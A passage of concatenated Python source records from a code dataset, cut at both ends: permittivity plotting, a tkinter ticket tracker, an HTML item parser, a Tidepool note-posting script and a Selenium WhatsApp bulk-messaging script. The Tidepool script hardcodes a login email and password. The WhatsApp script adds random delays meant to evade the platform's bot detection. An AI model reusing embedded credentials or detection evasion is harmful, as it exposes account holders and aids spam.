np.linspace(300,1100,pts)\n nr = waves*0+ 1.0\n ni = waves*0\n omega = 2*np.pi*c*hbar/(e*waves*1e-9)\n for i in range(size):\n eps_new = sig[i]*wp**2/(f[i]**2-omega**2 - 1j*omega*gam[i])\n nr += eps_new.real\n ni += eps_new.imag\n py.figure(1)\n py.plot(waves,nr,label=\"real\")\n py.plot(waves,ni,label=\"imag\")\n py.title(\"Au permittivity\")\n py.xlabel(\"Wavelength (nm)\")\n py.ylabel(\"Relative permittivity\")\n py.legend()\n\n return nr,ni\n \ndef Ag():\n wp = 9.01\n #sig = [.845,.065,.124,.011,.840,5.646]\n #f = [0,.816,4.481,8.185,9.083,20.29]\n #gam = [.048,3.886,.452,.065,.916,2.419]\n sig = [1.01889808, 0.62834151]\n f = [0,5.05635462]\n gam = [0.01241231, 0.54965831]\n size = len(sig)\n \n waves = np.linspace(300,1100,pts)\n nr = waves*0+ 1.0\n ni = waves*0\n omega = 2*np.pi*c*hbar/(e*waves*1e-9)\n for i in range(size):\n eps_new = sig[i]*wp**2/(f[i]**2-omega**2 - 1j*omega*gam[i])\n n_new = eps_new\n nr += n_new.real\n ni += n_new.imag\n py.figure(1)\n py.plot(waves,nr,'b--',label=\"real, Rakic\")\n py.plot(waves,ni,'g--',label=\"imag, Rakic\")\n py.title(\"Ag Permittivity\")\n py.xlabel(\"Wavelength (nm)\")\n py.ylabel(\"Relative permittivity\")\n\n return nr,ni\n\ndef effective(nr, ni, f):\n em = 1.33**2\n ratio = (nr-em)/(nr + 2*em)\n new_nr = em*(1+3*f*ratio/(1-f*ratio))\n new_ni = ni\n return new_nr, new_ni\n\ndef make_eps_file(nr,ni):\n for i in range(pts):\n str_to_write = str(waves[i]) +'\\t' + str(nr[i]) +'\\t' + str(ni[i]) + '\\n'\n eps_file.write(str_to_write)\n\ndef plot_eps_file(name):\n py.figure(1)\n out_file = open(name,'r')\n A = []\n B = []\n C = []\n for line in out_file:\n lam,a,b = [float(k) for k in line.split()]\n A.append(lam); B.append(a); C.append(b)\n py.plot(A,B,'b', label = \"real, JC\")\n py.plot(A,C,'g', label = \"imag, JC\")\n py.legend(loc=3)\n return np.array(B),np.array(C)\n\ndef plot_cross_sections(name, style = \"-\"):\n py.figure(2)\n out_file = open(name,'r')\n A = []\n B = []\n C = []\n for line in out_file:\n try:\n q,lam,a,b,c = [float(k) for k in line.split()]\n except:\n continue\n A.append(a); B.append(b); C.append(c)\n A,B,C = map(np.array, [A,B,C])\n py.plot(waves,A, 'b' + style)\n py.plot(waves,B, 'g' + style)\n #py.plot(waves,C/10**6, 'r' + style)\n py.xlabel(\"wavelength (nm)\")\n py.ylabel(\"Cross Section ($\\mu m^2$)\")\n py.title(\"Cross Sections\")\n\n#nr,ni = Ag()\n#nr, ni = effective(nr,ni,0.13)\n#make_eps_file(nr,ni)\n#nr, ni = plot_eps_file(\"eps_ag_jc.txt\")\n#nr, ni = effective(nr,ni,0.27)\n#make_eps_file(nr,ni)\n\nplot_cross_sections(\"sphere.out\")\n#plot_cross_sections(\"cluster_rakic.out\", \"--\")\npy.grid()\npy.show()\n","sub_path":"make_file.py","file_name":"make_file.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"66917975","text":"import tkinter\nimport pickle\nfrom tkinter import END\n\nclass MainWindow:\n\n def __init__(self):\n\n self.mainWindow = tkinter.Tk()\n self.mainWindow.title(\"Ticketing System\")\n\n self.ticketButton = tkinter.Button(self.mainWindow, text=\"Open Ticketing System\", command=self.displayTickets)\n ##self.studentsButton = tkinter.Button(self.mainWindow, text=\"Open Agent System\", command=self.displayAgents)\n self.archiveButton = tkinter.Button(self.mainWindow, text=\"Open Ticket Archive\", command = self.displayArchive)\n self.quitButton = tkinter.Button(self.mainWindow, text=\"Quit\", command = self.mainWindow.destroy)\n\n self.ticketButton.pack()\n ##self.studentsButton.pack()\n self.archiveButton.pack()\n self.quitButton.pack()\n\n tkinter.mainloop()\n\n def displayTickets(self):\n ticketGUI = ticketWindow()\n \n\n ##def displayAgents(self):\n ## print(\"Under Construction\")\n\n def displayArchive(self):\n archiveGUI = archiveWindowClass()\n\n\nclass ticketWindow:\n\n def __init__(self):\n\n self.ticketWindow = tkinter.Toplevel()\n self.ticketWindow.title(\"Ticketing System\")\n\n self.addTicketButton = tkinter.Button(self.ticketWindow, text=\"Add Ticket\", command=self.addTicket)\n self.editTicketButton = tkinter.Button(self.ticketWindow, text=\"Edit Ticket\", command=self.editTicket)\n self.quitButton = tkinter.Button(self.ticketWindow, text = \"Quit\", command = self.ticketQuit)\n\n self.addTicketButton.pack()\n self.editTicketButton.pack()\n self.quitButton.pack()\n\n tkinter.mainloop()\n\n def addTicket(self):\n addTicketGUI = addTicketWindowClass()\n\n def editTicket(self):\n editTicketGUI = editTicketWindowClass()\n\n def ticketQuit(self):\n self.ticketWindow.destroy()\n\nclass addTicketWindowClass:\n\n def __init__(self):\n\n\n self.addTicketWindow = tkinter.Toplevel()\n self.addTicketWindow.title(\"Create Ticket\")\n\n self.ticketIDFrame = tkinter.Frame(self.addTicketWindow)\n self.ticketSubjectFrame = tkinter.Frame(self.addTicketWindow)\n self.ticketStateFrame = tkinter.Frame(self.addTicketWindow)\n self.ticketAssignedFrame = tkinter.Frame(self.addTicketWindow)\n self.ticketPriorityFrame = tkinter.Frame(self.addTicketWindow)\n self.ticketDescriptionFrame = tkinter.Frame(self.addTicketWindow)\n self.ticketCommentsFrame = tkinter.Frame(self.addTicketWindow)\n self.exitFrame = tkinter.Frame(self.addTicketWindow)\n\n self.ticketIDFrame.pack()\n self.ticketSubjectFrame.pack()\n self.ticketStateFrame.pack()\n self.ticketAssignedFrame.pack()\n self.ticketPriorityFrame.pack()\n self.ticketDescriptionFrame.pack()\n self.ticketCommentsFrame.pack()\n self.exitFrame.pack()\n\n self.ticketIDLabel = tkinter.Label(self.ticketIDFrame, text=\"Ticket ID:\")\n self.ticketIDEntry = tkinter.Entry(self.ticketIDFrame, width=10)\n self.ticketIDLabel.pack(side=\"left\")\n self.ticketIDEntry.pack(side=\"left\")\n\n self.ticketSubjectLabel = tkinter.Label(self.ticketSubjectFrame, text=\"Ticket Subject:\")\n self.ticketSubjectEntry = tkinter.Entry(self.ticketSubjectFrame, width = 20)\n self.ticketSubjectLabel.pack(side=\"left\")\n self.ticketSubjectEntry.pack(side=\"left\")\n \n self.ticketStateLabel = tkinter.Label(self.ticketStateFrame, text=\"Ticket State:\")\n self.ticketStateEntry = tkinter.Entry(self.ticketStateFrame, width = 10)\n self.ticketStateEntry.insert(0, \"Open\")\n self.ticketStateLabel.pack(side=\"left\")\n self.ticketStateEntry.pack(side=\"left\")\n\n self.ticketAssignedLabel = tkinter.Label(self.ticketAssignedFrame, text=\"Assigned Student:\")\n self.ticketAssignedEntry = tkinter.Entry(self.ticketAssignedFrame, width = 20)\n self.ticketAssignedLabel.pack(side=\"left\")\n self.ticketAssignedEntry.pack(side=\"left\")\n\n self.ticketPriorityLabel = tkinter.Label(self.ticketPriorityFrame, text=\"Priority:\")\n self.ticketPriorityEntry = tkinter.Entry(self.ticketPriorityFrame, width=10)\n self.ticketPriorityEntry.insert(0, \"Low\")\n self.ticketPriorityLabel.pack(side=\"left\")\n self.ticketPriorityEntry.pack(side=\"left\")\n\n self.ticketDescriptionLabel = tkinter.Label(self.ticketDescriptionFrame, text=\"Description:\")\n self.ticketDescriptionEntry = tkinter.Text(self.ticketDescriptionFrame, height=5)\n self.ticketDescriptionLabel.pack(side=\"top\")\n self.ticketDescriptionEntry.pack(side=\"top\")\n\n self.ticketCommentsLabel = tkinter.Label(self.ticketCommentsFrame, text=\"Comments:\")\n self.ticketCommentsEntry = tkinter.Text(self.ticketCommentsFrame, height=3)\n self.ticketCommentsLabel.pack(side=\"top\")\n self.ticketCommentsEntry.pack(side=\"top\")\n\n self.saveButton = tkinter.Button(self.exitFrame, text=\"Save\", command=self.saveTicket)\n self.exitButton = tkinter.Button(self.exitFrame, text=\"Exit\", command=self.exitTicket)\n self.savedLabel = tkinter.Label(self.exitFrame, text=\"\")\n self.saveButton.pack(side=\"left\")\n self.exitButton.pack(side=\"left\")\n self.savedLabel.pack(side=\"right\")\n\n def saveTicket(self):\n\n go = 0\n \n id = self.ticketIDEntry.get()\n\n if id == \"\":\n self.savedLabel.config(text=\"An ID is required.\")\n else:\n go = 1\n\n subject = self.ticketSubjectEntry.get()\n state = self.ticketStateEntry.get()\n assigned = self.ticketAssignedEntry.get()\n priority = self.ticketPriorityEntry.get()\n description = self.ticketDescriptionEntry.get(\"1.0\",\"end-1c\")\n comments = self.ticketCommentsEntry.get(\"1.0\",\"end-1c\")\n \n\n list = [id, subject, state, assigned, priority, description, comments]\n\n if go == 1:\n\n filename = \"tickets/\" + id + \".dat\"\n\n ##creates the ticket file\n file = open(filename, \"wb\")\n pickle.dump(list, file)\n file.close()\n self.savedLabel.config(text=\"Saved successfully.\")\n\n try:\n file = open(\"tickets/archive.dat\", \"rb\")\n archive = pickle.load(file)\n file.close()\n except:\n file.close()\n file = open(\"tickets/archive.dat\", \"wb\")\n archive = dict()\n pickle.dump(archive, file)\n file.close()\n\n archive[id] = list\n\n file = open(\"tickets/archive.dat\", \"wb\")\n pickle.dump(archive, file)\n file.close()\n\n\n def exitTicket(self):\n self.addTicketWindow.destroy()\n\nclass editTicketWindowClass:\n\n def __init__(self):\n\n\n\n self.editTicketWindow = tkinter.Toplevel()\n self.editTicketWindow.title(\"Edit Ticket\")\n\n self.ticketIDFrame = tkinter.Frame(self.editTicketWindow)\n self.ticketSubjectFrame = tkinter.Frame(self.editTicketWindow)\n self.ticketStateFrame = tkinter.Frame(self.editTicketWindow)\n self.ticketAssignedFrame = tkinter.Frame(self.editTicketWindow)\n self.ticketPriorityFrame = tkinter.Frame(self.editTicketWindow)\n self.ticketDescriptionFrame = tkinter.Frame(self.editTicketWindow)\n self.ticketCommentsFrame = tkinter.Frame(self.editTicketWindow)\n self.exitFrame = tkinter.Frame(self.editTicketWindow)\n\n self.fileFrame = tkinter.Frame(self.editTicketWindow)\n\n self.fileFrame.pack()\n self.ticketIDFrame.pack()\n self.ticketSubjectFrame.pack()\n self.ticketStateFrame.pack()\n self.ticketAssignedFrame.pack()\n self.ticketPriorityFrame.pack()\n self.ticketDescriptionFrame.pack()\n self.ticketCommentsFrame.pack()\n self.exitFrame.pack()\n \n\n self.fileLabel = tkinter.Label(self.fileFrame, text=\"Ticket ID/Filename:\")\n self.fileEntry = tkinter.Entry(self.fileFrame, width=10)\n self.fileButton = tkinter.Button(self.fileFrame, text=\"Import\", command=self.loadTicket)\n self.loadedLabel = tkinter.Label(self.fileFrame, text=\"\")\n \n self.fileLabel.pack(side=\"left\")\n self.fileEntry.pack(side=\"left\")\n self.fileButton.pack(side=\"left\")\n self.loadedLabel.pack(side=\"left\")\n\n self.ticketIDLabel = tkinter.Label(self.ticketIDFrame, text=\"Ticket ID:\")\n self.ticketIDEntry = tkinter.Entry(self.ticketIDFrame, width=10)\n self.ticketIDLabel.pack(side=\"left\")\n self.ticketIDEntry.pack(side=\"left\")\n\n self.ticketSubjectLabel = tkinter.Label(self.ticketSubjectFrame, text=\"Ticket Subject:\")\n self.ticketSubjectEntry = tkinter.Entry(self.ticketSubjectFrame, width = 20)\n self.ticketSubjectLabel.pack(side=\"left\")\n self.ticketSubjectEntry.pack(side=\"left\")\n \n self.ticketStateLabel = tkinter.Label(self.ticketStateFrame, text=\"Ticket State:\")\n self.ticketStateEntry = tkinter.Entry(self.ticketStateFrame, width = 10)\n self.ticketStateEntry.insert(0, \"Open\")\n self.ticketStateLabel.pack(side=\"left\")\n self.ticketStateEntry.pack(side=\"left\")\n\n self.ticketAssignedLabel = tkinter.Label(self.ticketAssignedFrame, text=\"Assigned Student:\")\n self.ticketAssignedEntry = tkinter.Entry(self.ticketAssignedFrame, width = 20)\n self.ticketAssignedLabel.pack(side=\"left\")\n self.ticketAssignedEntry.pack(side=\"left\")\n\n self.ticketPriorityLabel = tkinter.Label(self.ticketPriorityFrame, text=\"Priority:\")\n self.ticketPriorityEntry = tkinter.Entry(self.ticketPriorityFrame, width=10)\n self.ticketPriorityEntry.insert(0, \"Low\")\n self.ticketPriorityLabel.pack(side=\"left\")\n self.ticketPriorityEntry.pack(side=\"left\")\n\n self.ticketDescriptionLabel = tkinter.Label(self.ticketDescriptionFrame, text=\"Description:\")\n self.ticketDescriptionEntry = tkinter.Text(self.ticketDescriptionFrame, height=5)\n self.ticketDescriptionLabel.pack(side=\"top\")\n self.ticketDescriptionEntry.pack(side=\"top\")\n\n self.ticketCommentsLabel = tkinter.Label(self.ticketCommentsFrame, text=\"Comments:\")\n self.ticketCommentsEntry = tkinter.Text(self.ticketCommentsFrame, height=3)\n self.ticketCommentsLabel.pack(side=\"top\")\n self.ticketCommentsEntry.pack(side=\"top\")\n\n self.saveButton = tkinter.Button(self.exitFrame, text=\"Save\", command=self.saveTicket)\n self.exitButton = tkinter.Button(self.exitFrame, text=\"Exit\", command=self.exitTicket)\n self.saveButton.pack(side=\"left\")\n self.exitButton.pack(side=\"left\")\n\n self.savedLabel = tkinter.Label(self.exitFrame, text=\"\")\n self.savedLabel.pack(side=\"left\")\n\n def saveTicket(self):\n\n id = self.ticketIDEntry.get()\n subject = self.ticketSubjectEntry.get()\n state = self.ticketStateEntry.get()\n assigned = self.ticketAssignedEntry.get()\n priority = self.ticketPriorityEntry.get()\n description = self.ticketDescriptionEntry.get(\"1.0\",\"end-1c\")\n comments = self.ticketCommentsEntry.get(\"1.0\",\"end-1c\")\n\n list = [id, subject, state, assigned, priority, description, comments]\n\n filename = \"tickets/\" + id + \".dat\"\n\n file = open(filename, \"wb\")\n pickle.dump(list, file)\n file.close()\n\n self.savedLabel.config(text=\"Successfully saved.\")\n\n\n def loadTicket(self):\n\n filename = self.fileEntry.get()\n filename = filename = \"tickets/\" + filename + \".dat\"\n\n inputFile = open(filename, \"rb\")\n\n input = pickle.load(inputFile)\n\n inputFile.close()\n\n self.ticketIDEntry.delete(0, END)\n self.ticketSubjectEntry.delete(0, END)\n self.ticketStateEntry.delete(0, END)\n self.ticketAssignedEntry.delete(0, END)\n self.ticketPriorityEntry.delete(0, END)\n self.ticketDescriptionEntry.delete(1.0, END)\n self.ticketCommentsEntry.delete(1.0, END)\n\n self.ticketIDEntry.insert(0, input[0])\n self.ticketSubjectEntry.insert(0, input[1])\n self.ticketStateEntry.insert(0, input[2])\n self.ticketAssignedEntry.insert(0, input[3])\n self.ticketPriorityEntry.insert(0, input[4])\n self.ticketDescriptionEntry.insert(1.0, input[5])\n self.ticketCommentsEntry.insert(1.0, input[6])\n\n self.loadedLabel.config(text=\"Successfully loaded.\")\n\n def exitTicket(self):\n self.editTicketWindow.destroy()\n\nclass archiveWindowClass:\n\n def __init__(self):\n\n self.archiveWindow = tkinter.Toplevel()\n self.archiveWindow.title(\"Ticket Archive\")\n\n self.viewArchiveButton = tkinter.Button(self.archiveWindow, text=\"View Tickets\", command=self.viewArchive)\n self.printArchiveButton = tkinter.Button(self.archiveWindow, text=\"Print Archive to Plaintext\", command=self.printArchive)\n\n self.viewArchiveButton.pack()\n self.printArchiveButton.pack()\n\n def viewArchive(self):\n viewArchiveGUI = viewArchiveClass()\n\n def printArchive(self):\n try:\n file = open(\"tickets/archive.dat\", \"rb\")\n archive = pickle.load(file)\n file.close()\n file = open(\"archive.txt\", \"w\")\n\n for x in archive:\n list = archive[x]\n\n file.write(\"ID: \" + list[0] + \"\\n\")\n file.write(\"Subject: \" + list[1] + \"\\n\")\n file.write(\"State: \" + list[2] + \"\\n\")\n file.write(\"Assigned: \" + list[3] + \"\\n\")\n file.write(\"Priority: \" + list[4] + \"\\n\")\n file.write(\"Descrption: \" + list[5] + \"\\n\")\n file.write(\"Comments: \" + list[6] + \"\\n\")\n file.write(\"\\n\")\n\n self.printArchiveButton.config(text=\"Printed to Archive.txt\")\n except:\n print(\"At least one ticket must be generated before the archival system can be used.\")\n\nclass viewArchiveClass:\n\n output = list()\n archive = dict()\n index = 0\n\n def __init__(self):\n\n try:\n file = open(\"tickets/archive.dat\", \"rb\")\n self.archive = pickle.load(file)\n file.close()\n except:\n print(\"At least one ticket must be generated before the archival system can be used.\")\n\n self.viewArchiveWindow = tkinter.Toplevel()\n self.viewArchiveWindow.title(\"View Archive\")\n\n self.archiveList = tkinter.Listbox(self.viewArchiveWindow, selectmode=\"SINGLE\")\n self.archiveButton = tkinter.Button(self.viewArchiveWindow, text=\"Select\", command=self.selectIndex)\n self.archiveList.pack()\n self.archiveButton.pack()\n\n self.archiveViewFrame = tkinter.Frame(self.viewArchiveWindow)\n self.archiveViewFrame.pack()\n\n self.archiveIDLabel = tkinter.Label(self.archiveViewFrame, text=\"Ticket ID:\")\n self.archiveIDLabel.pack(side=\"top\")\n\n self.archiveSubjectLabel = tkinter.Label(self.archiveViewFrame, text=\"Ticket Subject:\")\n self.archiveSubjectLabel.pack(side=\"top\")\n \n self.archiveStateLabel = tkinter.Label(self.archiveViewFrame, text=\"Ticket State:\")\n self.archiveStateLabel.pack(side=\"top\")\n\n self.archiveAssignedLabel = tkinter.Label(self.archiveViewFrame, text=\"Assigned Student:\")\n self.archiveAssignedLabel.pack(side=\"top\")\n\n self.archivePriorityLabel = tkinter.Label(self.archiveViewFrame, text=\"Priority:\")\n self.archivePriorityLabel.pack(side=\"top\")\n\n self.archiveDescriptionLabel = tkinter.Label(self.archiveViewFrame, text=\"Description:\")\n self.archiveDescriptionLabel.pack(side=\"top\")\n\n self.archiveCommentsLabel = tkinter.Label(self.archiveViewFrame, text=\"Comments:\")\n self.archiveCommentsLabel.pack(side=\"top\")\n\n for var in self.archive:\n list = self.archive[var]\n self.archiveList.insert(END, list[0])\n\n def selectIndex(self):\n\n index = self.archiveList.get(self.archiveList.curselection())\n self.output = self.archive[index]\n\n ID = self.output[0]\n subject = self.output[1]\n state = self.output[2]\n assigned = self.output[3]\n priority = self.output[4]\n description = self.output[5]\n comments = self.output[6]\n\n self.archiveIDLabel.config(text=\"Ticket ID: \" + ID)\n self.archiveSubjectLabel.config(text=\"Ticket Subject: \" + subject)\n self.archiveStateLabel.config(text=\"Ticket State: \" + state)\n self.archiveAssignedLabel.config(text=\"Assigned Student: \" + assigned)\n self.archivePriorityLabel.config(text=\"Priority: \" + priority)\n self.archiveDescriptionLabel.config(text=\"Description: \" + description)\n self.archiveCommentsLabel.config(text=\"Comments: \" + comments)\n\n \n\n \n\n \n","sub_path":"Release/windows.py","file_name":"windows.py","file_ext":"py","file_size_in_byte":16877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"417498621","text":"from bs4 import BeautifulSoup, NavigableString\n\n# styles = {\n# \"-mod\": \"#%s\",\n# \"-value\": \"**%s**\",\n# \"-flavour\": \"*%s*\",\n# \"-corrupted\": \"%s\"\n# }\n\nhide_string = \"##### \\n\\n###### \\n\\n#### \\n\\n%s\\n\\n***\\n\\n\"\n\ndef parse_item(page):\n soup = BeautifulSoup(page, \"html.parser\")\n # Find div with class item-box. Only unique items so far..\n itembox = soup.find(\"div\", { \"class\": \"item-box\" })\n if not itembox or \"-unique\" not in itembox[\"class\"]: return \"\"\n header = itembox.find(\"span\", { \"class\": \"header\" })\n unique_name = header.children.next().text\n base_item = header.find(\"a\").text\n \n unparsed_groups = itembox.find(\"span\", { \"class\": \"item-stats\" }).find_all(\"span\", { \"class\": \"group\" })\n \n groups = []\n for group in unparsed_groups:\n lines = []\n line = \"\"\n for child in group.children:\n if not unicode(child).strip():\n continue #Ignore whitespace lines.\n elif unicode(child) == '
':\n lines.append(line)\n line = \"\"\n else: \n line += format_text(child) or \"\"\n if line is not \"\":\n lines.append(line)\n groups.append(lines)\n item_string = make_string(unique_name, base_item, groups)\n #return (hide_string % unique_name) + item_string + \"\\n\\n\" #Add hiding.. Shows \"GGG forum post. Hover to view.\".\n return item_string + \"\\n\\n\"\n\ndef format_text(child):\n if type(child) == NavigableString:\n classes = child.parent[\"class\"]\n else:\n classes = child[\"class\"]\n\n if \"-value\" in classes:\n return \"**%s**\" % child.string\n elif \"-corrupted\" in classes:\n return child.string\n elif \"-fire\" in classes:\n return child.string #Should be red, but not possible.\n elif \"-cold\" in classes:\n return child.string #Should be blue, but not possible.\n elif \"-lightning\" in classes:\n return child.string #Should be yellow, but not possible.\n elif \"-mod\" in classes: \n return \"#%s\" % child.string\n elif \"-flavour\" in classes: \n return \"*%s*\\n>>\" % child.string.strip()\n else:\n return child.string\n\ndef make_string(name, base, groups):\n s = \">######%s[](#break)%s\\n\" % (name, base)\n #s = \">######[%s](%s)[](#break)%s\\n\" % (name, link, base) #also include link in the header..\n for group in groups:\n for line in group:\n s += \">>%s%s\\n\" % (\"\" if line.startswith(\"*\") else \"####\", line)\n s += \">>[](#line)\\n\"\n if len(groups) > 0:\n s = s[:-13]\n return s\n\n# parse_item(open(\"asdf.txt\", \"r\").read())","sub_path":"itemparser.py","file_name":"itemparser.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"502570082","text":"import base64\nimport requests\nimport uuid\nimport ast\n\ndef make_login_request(username, password):\n base64_login_string = base64.b64encode(b'karina@tidepool.org:Cokacola123')\n url = 'https://devel-api.tidepool.io/auth/login'\n headers = {'Authorization': \"Basic \" + str(base64_login_string)[2:-1]}\n r = requests.post(url, headers=headers)\n session_token = r.headers['x-tidepool-session-token']\n text_to_object = ast.literal_eval(r.text)\n user_id = text_to_object['userid']\n return session_token, user_id\n\ndef make_note_request(session_token, user_id, note_text):\n \"\"\" session_token goes in header and is required for every note request\n user_id goes in the end of the url\n note goes in the body\n \"\"\"\n # formated_note = format_note(user_id, note_text)\n \n #body = {\"message\": formated_note}\n headers = {'x-tidepool-session-token': session_token}\n url = 'https://devel-api.tidepool.io/message/send/' + user_id\n body = {\n 'guid': 'abcde',\n 'parentmessage' : 'null', #None,\n 'userid': user_id,\n 'groupid': user_id,\n 'timestamp': '2013-11-28T23:07:40+00:00',\n 'createdtime': '2013-11-28T23:07:40+00:00',\n 'messagetext': 'In three words I can sum up everything I have learned about life: it goes on.'\n }\n r = requests.post(url, headers=headers, data=body)\n print(r.headers)\n print(r)\n print(r.text)\n\ndef format_note(user_id, note_text):\n note = {}\n note[\"guid\"] = str(uuid.uuid4())\n note[\"userid\"] = user_id\n note[\"groupid\"] = user_id\n note[\"parentmessage\"] = None,\n time_from_note = note_text[\"effective_time_frame\"][\"time_interval\"][\"start_date_time\"]\n formated_time = time_from_note[:19] + '-' + time_from_note[24:]\n note[\"timestamp\"] = formated_time\n note[\"messagetext\"] = str(note_text)\n return note\n\nsession_token, user_id = make_login_request('karina@tidepool.org', 'Cokacola123')\nnote_text = {\"activity_name\": \"Walking\",\n \"distance\": {\n \"value\": 1668.16991784243,\n \"unit\": \"m\"\n },\n \"effective_time_frame\": {\n \"time_interval\": {\n \"start_date_time\": \"2015-08-02T15:58:21.000-07:00\",\n \"duration\": {\n \"value\": 1179.089,\n \"unit\": \"sec\"\n }\n }\n }\n }\n\nmake_note_request(session_token, user_id, note_text)\n\n\n\n","sub_path":"mhealth.py","file_name":"mhealth.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"425133041","text":"import traceback\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.chrome.options import Options\n\nimport os\nimport platform\nfrom tkinter import Tk\nimport time\nfrom random import seed, random\nimport argparse\n\ntry:\n import autoit\nexcept ModuleNotFoundError:\n pass\n\n\ndef whatsapp_login():\n global wait, browser, search_button, button_frame\n\n if platform.system() == 'Darwin':\n # MACOS Path\n chrome_default_path = os.getcwd() + '/driver/chromedriver'\n else:\n # Windows Path\n chrome_default_path = os.getcwd() + '/driver/chromedriver.exe'\n\n Link = \"https://web.whatsapp.com/\"\n chrome_options = Options()\n chrome_options.add_argument('--user-data-dir=./User_Data')\n chrome_options.add_argument(\"--log-level=3\")\n browser = webdriver.Chrome(\n executable_path=chrome_default_path, options=chrome_options)\n wait = WebDriverWait(browser, 5)\n browser.get(Link)\n browser.maximize_window()\n\n input(\"\\nAfter the page loads properly, press [ENTER]\\n\")\n input(\n \"Now, try to copy the message until the 'WA preview' for the links loads properly, then delete it again\\nFinally press [ENTER]\\n\")\n\n # Defining the search button\n button_x_arg = \"//button[.//span[@data-icon='search']]\"\n search_button = wait.until(\n EC.presence_of_element_located((By.XPATH, button_x_arg)))\n\n frame_x_arg = \"//span[@data-icon='back']/..\"\n button_frame = wait.until(\n EC.presence_of_element_located((By.XPATH, frame_x_arg)))\n\n\ndef isSearchActive():\n search_active = button_frame.value_of_css_property(\"opacity\")\n return(int(search_active))\n\n\ndef contact_parser():\n # Parsing the argument and checks if the contact file exist\n parser = argparse.ArgumentParser(description='Add contact-file argument')\n parser.add_argument('contact_file', type=str, nargs=1)\n try:\n args = parser.parse_args()\n contact_file_name = args.contact_file[0]\n contact_file_path = os.getcwd() + \"\\\\contacts\\\\\" + contact_file_name + \".txt\"\n except:\n contact_file_name = input(\"Insert the name of the contact file that you want to send: \")\n contact_file_path = os.path.dirname(os.path.abspath(__file__)) + \"\\\\contacts\\\\\" + contact_file_name + \".txt\"\n return contact_file_path\n\n\ndef import_contacts():\n contact_file_path = contact_parser()\n contact = []\n try:\n fp = open(contact_file_path, \"r\")\n except Exception as e:\n raise e\n\n while True:\n line = fp.readline()\n con = ' '.join(line.split())\n if con:\n contact.append('\\\"' + con + '\\\"')\n if not line:\n break\n\n fp.close()\n return contact\n\n\ndef import_message():\n print(\"Here's your message (emojis might not be printed in the console)\\n\")\n message = open(\"message.txt\", \"r\", encoding=\"utf8\")\n message = message.read()\n print(message + \"\\n\\n\")\n # copy message to clipboard\n r = Tk()\n r.withdraw()\n r.clipboard_append(message)\n r.update()\n\n\ndef attachment_verification():\n isAttach = input(\"Would you like to send attachment(yes/no):\")\n\n if isAttach == \"yes\":\n input(\n \"\\n\\nTo send attachment: Put the image on `.\\\\attachment`, then press [ENTER]\")\n image_name = input(\n \"Write the name of the file (including the file format): \")\n image_path = os.getcwd() + \"\\\\attachment\\\\\" + image_name\n print(image_path)\n\n while not os.path.exists(image_path) and image_name != '':\n image_name = input(\n \"Wrong file name, Write the name of the file (including the file format): \")\n image_path = os.getcwd() + \"\\\\attachment\\\\\" + image_name\n print(image_path)\n else:\n image_path = None\n return isAttach, image_path\n\n\ndef send_message(target, image_path):\n if isSearchActive():\n print(\"Search is active, unpressing the button\")\n search_button.click()\n\n try:\n search_button.click()\n actions = ActionChains(browser)\n actions.send_keys(target[1:-1])\n actions.perform()\n\n name_x_arg = '//span[@title=' + target + ']'\n try:\n group_title = wait.until(\n EC.presence_of_element_located((By.XPATH, name_x_arg)))\n group_title.click()\n except:\n print(target + \" tidak ada di WA\")\n error_file.write(target[1:-1] + \"\\n\")\n search_button.click()\n return\n\n try:\n browser.find_element_by_xpath(\n \"//*[contains(text(),'t send a message to blocked contact')]\")\n search_button.click()\n error_file.write(target[1:-1] + \"\\n\")\n print(target + \" di block\")\n return\n except:\n pass\n\n try:\n browser.find_element_by_xpath(\n \"//*[contains(text(),'Tidak dapat mengirim pesan ke kontak terblokir')]\")\n search_button.click()\n error_file.write(target[1:-1] + \"\\n\")\n print(target + \" di block\")\n return\n except:\n pass\n\n input_box = browser.find_element_by_xpath(\n '//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')\n\n ActionChains(browser).key_down(Keys.CONTROL).key_down('v').key_up(Keys.CONTROL).key_up(\n 'v').key_up(Keys.BACKSPACE).perform()\n\n input_box.send_keys(Keys.ENTER)\n print(\"Message sent successfully to \" + target)\n\n if (isAttach == \"yes\"):\n try:\n send_attachment(image_path)\n except:\n print('Attachment not sent.')\n\n except:\n return\n\n\ndef send_attachment(path):\n # Attachment Drop Down Menu\n try:\n clipButton = browser.find_element_by_xpath(\n '//*[@id=\"main\"]/footer/div[1]/div[1]/div[2]/div/div/span')\n clipButton.click()\n except:\n pass\n\n # Clicking the Media button\n try:\n mediaButton = wait.until(\n EC.presence_of_element_located((By.XPATH, '//*[@id=\"main\"]/footer/div[1]/div[1]/div[2]/div/span/div/div/ul/li[1]/button')))\n mediaButton.click()\n except:\n pass\n time.sleep(2)\n\n # Sending paths to pop-up windows\n autoit.send(path)\n autoit.send(\"{ENTER}\")\n\n # Clicking the send button\n try:\n x_arg_imgsend = '//*[@id=\"app\"]/div/div/div[2]/div[2]/span/div/span/div/div/div[2]/span/div/div'\n whatsapp_send_button = wait.until(\n EC.presence_of_element_located((By.XPATH, x_arg_imgsend)))\n whatsapp_send_button.click()\n except:\n traceback.print_exc()\n\n\ndef sender(contact, isAttach, image_path):\n global error_file\n\n # Seed to create random number to evade Whatsapp Bot detection\n seed(1)\n\n # Initiating error file\n error_file = open('contact_error.txt', 'w')\n error_file.write(\n \"Here are some contacts that give errors in this session\\n\")\n error_file.close()\n error_file = open('contact_error.txt', 'a', buffering=1)\n\n # Iterating through contacts list\n for target in contact:\n try:\n send_message(target, image_path)\n except:\n pass\n time.sleep(1 + random()*10/5)\n\n error_file.close()\n\n\nif __name__ == \"__main__\":\n # Initiating contacts, attachment, and message\n list_of_contact = import_contacts()\n isAttach, image_path = 